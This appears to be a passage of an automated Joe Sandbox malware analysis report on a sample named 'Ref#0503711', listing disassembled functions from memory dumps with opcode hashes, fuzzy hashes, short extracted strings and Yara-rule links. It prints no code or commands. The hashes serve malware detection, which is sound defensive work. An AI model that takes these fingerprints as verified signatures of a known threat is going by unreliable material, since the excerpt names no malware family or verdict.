                                                                • API String ID:
                                                                • Opcode ID: 7f71deee38a33edc3e9500487e795bf724c5260cfcc7933a5f863ea242c821e1
                                                                • Instruction ID: 7a30af9011019c0523d2298113cee90c5e53b1c883a5768f7c03971adde52533
                                                                • Opcode Fuzzy Hash: 7f71deee38a33edc3e9500487e795bf724c5260cfcc7933a5f863ea242c821e1
                                                                • Instruction Fuzzy Hash: D5D01770A00209EFCB10DFA8EE4195EBBB9EB45201B1042A99808E7310EB316E009B90
                                                                Function 01970A88 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87dac49084c159dccc4cee0f1194a598fe4999d0a7cdb885c310064adeef68f2
                                                                • Instruction ID: 0db445f4057e7728667df863356ad12f3d376626c450e0ea9a24bddb7656ebe7
                                                                • Opcode Fuzzy Hash: 87dac49084c159dccc4cee0f1194a598fe4999d0a7cdb885c310064adeef68f2
                                                                • Instruction Fuzzy Hash: 48D0E270C0020A8FCB40EFB8980855DBBB4EB04201B0046AAD80AE2614EB705A918B96
                                                                Function 0197DDCC Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45180bded258e4247a40f46a3b9010d42acbb9010d942da9d4b53b8e985c79b1
                                                                • Instruction ID: a498b2a6ad61f31638d23c8912456519f1d99f9ed41cf4af95a005ab4e75d127
                                                                • Opcode Fuzzy Hash: 45180bded258e4247a40f46a3b9010d42acbb9010d942da9d4b53b8e985c79b1
                                                                • Instruction Fuzzy Hash: 20E05AB8A052189FDB60CF68D984ADEBBF1EFA8314F1080999989A7744DB749D81CF00
                                                                Function 060A1CF8 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bf1839650b54705ef084eafa14f3b42ebd9a5fd228bf105dfa7b720cce9c9df
                                                                • Instruction ID: 688c816e06299cf51d3d119d21e8139b6deb8709075ed70971eadce167959f55
                                                                • Opcode Fuzzy Hash: 4bf1839650b54705ef084eafa14f3b42ebd9a5fd228bf105dfa7b720cce9c9df
                                                                • Instruction Fuzzy Hash: AED0C936048298AFC312C664DD208823F6AAB9A2527188092A009C6562C722A8269723
                                                                Function 060BE061 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f6bd12bbbdd85823be8776b3b8fe1bba068cd29d8bf8825b53164a57af01320
                                                                • Instruction ID: faa8cfc81c14cd3795118a353ad304d78e7ec6bbff067025ba96e6bbd3452c43
                                                                • Opcode Fuzzy Hash: 1f6bd12bbbdd85823be8776b3b8fe1bba068cd29d8bf8825b53164a57af01320
                                                                • Instruction Fuzzy Hash: 56D05E711096D65FC7028B30D864CA7BFB05F0B31032A81D7F4848B573D2254C60CB60
                                                                Function 060A2A10 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e72eabc15fdc49b914c8cd4e5cca8e57849c030a885ed26e0916aa4371f833c3
                                                                • Instruction ID: ee00cce23eec70d320ec32871f1fe689d092c205e84f96175a649dd2321a3151
                                                                • Opcode Fuzzy Hash: e72eabc15fdc49b914c8cd4e5cca8e57849c030a885ed26e0916aa4371f833c3
                                                                • Instruction Fuzzy Hash: 50D0C93510A251DFC702CB60CDA2800BBF2AF9B61471AC49EE5848B253CF379C17DB22
                                                                Function 0197D900 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f12f332caf65a091204b37575e6cde75ff84d869e16a6754b3cffad11c4714e2
                                                                • Instruction ID: 90ecb1be713193fd6957201a38beb38b3c60d7b4d60a97a65669fb075224d321
                                                                • Opcode Fuzzy Hash: f12f332caf65a091204b37575e6cde75ff84d869e16a6754b3cffad11c4714e2
                                                                • Instruction Fuzzy Hash: ADC080346091889BC701CF50D941C65B775DF42605714C6C6DC1DC7343C6339F079A51
                                                                Function 060A2FA1 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77875fdefc1f8efededd5cca2f164c0f73478766a67adb04a517a4af4075d25e
                                                                • Instruction ID: 872b75ee30575858b235aa31823396990ce4970df89bedb021212c80a17c2fd5
                                                                • Opcode Fuzzy Hash: 77875fdefc1f8efededd5cca2f164c0f73478766a67adb04a517a4af4075d25e
                                                                • Instruction Fuzzy Hash: 7EC0807715D3505FC3538B50DD05715FF705F56711F054593D5C489051C5355405D717
                                                                Function 060AA0DE Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10029f5367dab71ae8115419294b70c50b1b3e150f26ab56212b61d6029c641d
                                                                • Instruction ID: f6c29a40182a0844355a36068e8e79a9349645bbdb0c0a863c8f8087b4b775fa
                                                                • Opcode Fuzzy Hash: 10029f5367dab71ae8115419294b70c50b1b3e150f26ab56212b61d6029c641d
                                                                • Instruction Fuzzy Hash: 9DE0E278A452098FEB64CFA4C840BEABBB2FB8C304F0451A9D509A7645D7384880CB90
                                                                Function 060B1E00 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01ec5a6e3e315314c79dda418630901083f4cf94026a31b883b9cdb79a5d4a06
                                                                • Instruction ID: 89da72e2012c8027d83d5242998f81b4b37b7043f5d136fe45718dcfea67102a
                                                                • Opcode Fuzzy Hash: 01ec5a6e3e315314c79dda418630901083f4cf94026a31b883b9cdb79a5d4a06
                                                                • Instruction Fuzzy Hash: D5D0121808D2D00FCB274B3409A9060BFB16C0300231C88DAC2C0CB293C108156BD7A2
                                                                Function 0635D670 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a3569096786a0c20aa44b578fcd2e84803f1d24502581952e7ef3ec66a00415
                                                                • Instruction ID: 69703776c7b7e4521d57e1b936432086a2aba0518b09df5f03f2426d2fe8bd00
                                                                • Opcode Fuzzy Hash: 8a3569096786a0c20aa44b578fcd2e84803f1d24502581952e7ef3ec66a00415
                                                                • Instruction Fuzzy Hash: C4C02B3004B3098BC3A023C4780C7B43BDCDB06715FC234007D0C034110E7414B4C6C8
                                                                Function 019709A9 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b70047aae89952cb1aa130e12bc1e71257f46eed074375787ca1fb53bf8c79b5
                                                                • Instruction ID: 139b19a9c8212dff4d940ab2587bcb58bcea58ca547deec7f17cbfa5982a66a9
                                                                • Opcode Fuzzy Hash: b70047aae89952cb1aa130e12bc1e71257f46eed074375787ca1fb53bf8c79b5
                                                                • Instruction Fuzzy Hash: ADD0A9398483808FCB620B20AC080A87BB0EB8323031011AAC00A894F2D22C0821CB20
                                                                Function 01972B50 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d99f2bfaec60b840fb1144f857a06cba83876730441abae89e517bbad883110
                                                                • Instruction ID: 06a78b727e5d03b747c4d98b8c4f670ce2e1802d579b0202fef05f08a8869d9a
                                                                • Opcode Fuzzy Hash: 2d99f2bfaec60b840fb1144f857a06cba83876730441abae89e517bbad883110
                                                                • Instruction Fuzzy Hash: 0CC01230448342CFCBA18FA8CC05295BBB0BF02A21F02828A91889A855E37A8C42CB61
                                                                Function 060BBBA1 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 06d88e7e95a3beb0c35b990661eefec1ce79954ae7c09e4dcbf05c1f4a7b76d4
                                                                • Instruction ID: 125e3ffcb8dcc9ce47510608cba4f5ba0f41ff36359dbaa81483cd1344b9339f
                                                                • Opcode Fuzzy Hash: 06d88e7e95a3beb0c35b990661eefec1ce79954ae7c09e4dcbf05c1f4a7b76d4
                                                                • Instruction Fuzzy Hash: 3DB09B001593E55ED25713305C516C23F269B42540F55C6D352486F4A64955051D8615
                                                                Function 01978828 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ab23ae020f7831eb89fb71c877d7fbabb79a5d403b1b7d500d486099b00ef51
                                                                • Instruction ID: ba1f479401266bce4397e39431860efcce3680c87b5bb159b5e9efda7c766e52
                                                                • Opcode Fuzzy Hash: 5ab23ae020f7831eb89fb71c877d7fbabb79a5d403b1b7d500d486099b00ef51
                                                                • Instruction Fuzzy Hash: BFC08C34080608DBC3B07FE8BE0C3AC3AAC9B01322F103010EA0E02C148E7500F0C727
                                                                Function 060AAC41 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e15810aac74af188e3ee46e4e14dfac612884254fa2963b6270db3e1c97fd64
                                                                • Instruction ID: 5be0e275e005ab37742b74dfa00db79e5d811b6637911bcb74f469bfd7d72439
                                                                • Opcode Fuzzy Hash: 8e15810aac74af188e3ee46e4e14dfac612884254fa2963b6270db3e1c97fd64
                                                                • Instruction Fuzzy Hash: 0CD06C74E49258CBEB58DF64D844B9EBBB2EB94344F0080AD991AA6284CB390985CF41
                                                                Function 01970AB5 Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59304ad3898fde658db106412650fcb9cca91499302d54b320bdf483b71956dc
                                                                • Instruction ID: fa80102697634a03a6e9e6a2c5b7df9db910d938acbc07300bda7ac0d2b99365
                                                                • Opcode Fuzzy Hash: 59304ad3898fde658db106412650fcb9cca91499302d54b320bdf483b71956dc
                                                                • Instruction Fuzzy Hash: 0EC04C3455811A8BDB247FB4AD4C82C7B20EB52706B041B56E80B45928DFA158E54B97
                                                                Function 060BE070 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                Function 01972CE0 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2680356e0ddbe0faa6d731d0ed73f6aaa061dac38ce28a63d5c3a61c92dc27eb
                                                                • Instruction ID: bcac1dfb7a7ee7b65b322ad4c7bb18ef110ab69e40b853e87c7f49f4bcdb57c1
                                                                • Opcode Fuzzy Hash: 2680356e0ddbe0faa6d731d0ed73f6aaa061dac38ce28a63d5c3a61c92dc27eb
                                                                • Instruction Fuzzy Hash: FDB0123221420C0F175057FA2C08716369C5D004057405061AC0DC0101F640D0202644
                                                                Function 060A1D08 Relevance: .0, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1447918c1a5bdd3a72bf268b42c722303ef18aa2d19f53133a61f404e3156cf1
                                                                • Instruction ID: 000c37dd7ce9a88bf238dee489c4f7b6ac8ac8c1cff8728a020e28f34faeb26c
                                                                • Opcode Fuzzy Hash: 1447918c1a5bdd3a72bf268b42c722303ef18aa2d19f53133a61f404e3156cf1
                                                                • Instruction Fuzzy Hash: B7B09232000308AB87119A94EC04855BB69AB58701B048025B60906211CB32E822DB95
                                                                Function 019709B8 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 377e967bd2714de473cce7dec5f9ac6dea70940320428c7c3157028030cd8736
                                                                • Instruction ID: 841404150f891526e406135f3e51fcff6c10289c7f3f6aef3723d1dde75a1954
                                                                • Opcode Fuzzy Hash: 377e967bd2714de473cce7dec5f9ac6dea70940320428c7c3157028030cd8736
                                                                • Instruction Fuzzy Hash: F2A0113C002A88CF83202BA0BC0E028BB2CAA8222A3802020A00F802088A2028308B82
                                                                Function 01970850 Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f659bb8be2651f62cac6aa3c920b378ef9b1d7e2201a1b23fd6519eef67549bd
                                                                • Instruction ID: 275b325329ed27593d75fbc65c006d4fce58654243b7ac4ea433853c1b795798
                                                                • Opcode Fuzzy Hash: f659bb8be2651f62cac6aa3c920b378ef9b1d7e2201a1b23fd6519eef67549bd
                                                                • Instruction Fuzzy Hash: 8390023504464C8B4A9027DA7C0E655B75C95845157805051B50D465066F6564244695

                                                                Non-executed Functions

                                                                Function 01978A80 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJcq$Te^q$xbaq
                                                                • API String ID: 0-3225726259
                                                                • Opcode ID: 280005f757952d377af58b681b88c80d8cb827f016ef7193f26f64592899a089
                                                                • Instruction ID: 7554a478251ce8024a256326ca26d5de856be0072820277a33abfdf30776f13b
                                                                • Opcode Fuzzy Hash: 280005f757952d377af58b681b88c80d8cb827f016ef7193f26f64592899a089
                                                                • Instruction Fuzzy Hash: 86C16375E016188FDB58DF6AC944ADDBBF2AF89300F14C1AAD90DAB365DB305A81CF50
                                                                Function 060B4878 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$,bq
                                                                • API String ID: 0-1616511919
                                                                • Opcode ID: bbb6b179ba7e5334e947f0a2491b2ebd28b5006adbdba354efd3f931143f9872
                                                                • Instruction ID: ec71b3348b7856babe84c879372634395677b7b2cbf5266a6136b2d1ece381a7
                                                                • Opcode Fuzzy Hash: bbb6b179ba7e5334e947f0a2491b2ebd28b5006adbdba354efd3f931143f9872
                                                                • Instruction Fuzzy Hash: AFD11934A402158FDB94CF68C584AADBBF2FF88710F25D4A9E505AB366C730ED85CB50
                                                                Function 060A30B8 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 35cc6369a955e2a002c03f3722d3701557009ad41eac6042cbd2131f9f606b56
                                                                • Instruction ID: e11dd0018da48475d808c85bc9a2c2c44ae0692e687616ba20ff841a363b1ab9
                                                                • Opcode Fuzzy Hash: 35cc6369a955e2a002c03f3722d3701557009ad41eac6042cbd2131f9f606b56
                                                                • Instruction Fuzzy Hash: 8D225774B007168FCB99CFA9C89466EFBF2FB88341F248529D55AD7381DB34A801CB95
                                                                Function 019718B3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 84055fca7edcec707fb852c7e7cbb648d6e60916c9f3610ebde066b2ef7ae177
                                                                • Instruction ID: 97c793ca7e3862b088777e4251c18ddf6447a56cca9bed34b5a1e703e0e654a8
                                                                • Opcode Fuzzy Hash: 84055fca7edcec707fb852c7e7cbb648d6e60916c9f3610ebde066b2ef7ae177
                                                                • Instruction Fuzzy Hash: C8919471E002198FDB19CFA8C981BADB7B2FF85305F29C5A9D019AB255D734AD81CF80
                                                                Function 060A94EC Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 6353b5b02f4618d9db08a4ab0ecf20eaa0060c401649eed67831443710d3f0df
                                                                • Instruction ID: 612514726bd579ae721cd645ac84ea63dffcffa16c329ad4fa9ebbb56d5ef491
                                                                • Opcode Fuzzy Hash: 6353b5b02f4618d9db08a4ab0ecf20eaa0060c401649eed67831443710d3f0df
                                                                • Instruction Fuzzy Hash: 1B91E270E95319CFEBA4CFE9D484BADBBF2BB49345F2080AAD409A7251D7744984CF40
                                                                Function 060A992F Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4|cq
                                                                • API String ID: 0-1781815312
                                                                • Opcode ID: 349aeb8055492b440ec6e239070ef28bde8f13c611a867a1b896727ad80254ca
                                                                • Instruction ID: f2472151260fec19aa5074047f28af0573ec925a13fe734e7bb8fe6b6dfc1bb3
                                                                • Opcode Fuzzy Hash: 349aeb8055492b440ec6e239070ef28bde8f13c611a867a1b896727ad80254ca
                                                                • Instruction Fuzzy Hash: FF71E470E55218DFEB64CFAAC884B9DBBF2FF89340F1481AAD409A7251DB345A85CF41
                                                                Function 060A9940 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4|cq
                                                                • API String ID: 0-1781815312
                                                                • Opcode ID: 7f0f815b496d07bc9fd29c3dbb750786bd3c0dd48694f26098bd8e4129a21db8
                                                                • Instruction ID: 0112d2284d1c8e723d4e3d4432aac950fb209f6cc21daf55c7ab0ea2d38f57a4
                                                                • Opcode Fuzzy Hash: 7f0f815b496d07bc9fd29c3dbb750786bd3c0dd48694f26098bd8e4129a21db8
                                                                • Instruction Fuzzy Hash: 7071E670E55218DFEBA4CF6AC884BDDBBF2FB89340F1081AAD409A7251DB345A85CF41
                                                                Function 019730E8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 4ceb0141c698ea2016ba89233ab5cccd09d466a00a3ad70cd5ed64957b35951d
                                                                • Instruction ID: 4a8ffcdeb84524e411a5c4198fee617a09430f8cef890bf74c2f9e5343de4729
                                                                • Opcode Fuzzy Hash: 4ceb0141c698ea2016ba89233ab5cccd09d466a00a3ad70cd5ed64957b35951d
                                                                • Instruction Fuzzy Hash: 4151CE32F0015A9FDB10DBADD8801AEBBB2FFC5225B588576C518CB609E730E946C790
                                                                Function 06010040 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: z
                                                                • API String ID: 0-1657960367
                                                                • Opcode ID: abb8eff6ab086e00a93e866d11e0c77618db0f32fb18bf58f51b3fc5d527ace3
                                                                • Instruction ID: 1ad26b7fd8521e479364074b928664793fd873b84742408675c897cafec337bf
                                                                • Opcode Fuzzy Hash: abb8eff6ab086e00a93e866d11e0c77618db0f32fb18bf58f51b3fc5d527ace3
                                                                • Instruction Fuzzy Hash: 1E418871D056188BEB58DF6BDC4869DBBF7AFC8300F14C1EA940DAB224DB741A818F44
                                                                Function 0197E210 Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d986eedcf87247ed1c338600265840cb0787e5df7f8e4eb5e7a79ce7ff27b1d4
                                                                • Instruction ID: eff00f36854e83d0658db84d64d61f1407cb70fcd017e907429cd3db1b4a1d17
                                                                • Opcode Fuzzy Hash: d986eedcf87247ed1c338600265840cb0787e5df7f8e4eb5e7a79ce7ff27b1d4
                                                                • Instruction Fuzzy Hash: 2991DEB0D06218CFEB14DFA9C549BEDBBF1BF88315F2085AAD419B7250D7780A45CB54
                                                                Function 060E5388 Relevance: .2, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
